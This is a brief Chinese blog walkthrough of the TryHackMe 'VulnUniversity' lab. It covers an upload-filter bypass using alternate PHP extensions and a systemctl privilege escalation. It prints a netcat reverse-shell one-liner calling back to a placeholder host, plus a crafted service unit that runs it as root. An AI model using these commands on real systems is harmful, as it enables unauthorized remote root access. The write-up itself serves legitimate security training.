首页 > 其他 > 详细

Try Hack Me::VulnUniversity

时间:2021-02-05 15:14:18      阅读:38      评论:0      收藏:0      [点我收藏+]

0x00 摘要

该靶机属于入门级别的靶机,仅记录粗略过程及提权细节。

0x01 Task 2-4

考察了nmap、gobuster的使用。
在上传php文件时可尝试通过php3,php4,php5,phtml进行绕过。
技术分享图片

0x02 systemctl提权

教程提示通过如下命令查看服务的权限信息:

Use the command: find / -user root -perm -4000 -exec ls -ldb {} ;

技术分享图片

该命令不是很好用,通常使用linpeas.sh进行枚举。

systemctl提权参考
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo ‘[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target‘ > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF

技术分享图片
技术分享图片

Try Hack Me::VulnUniversity

原文:https://www.cnblogs.com/aya82/p/14377383.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!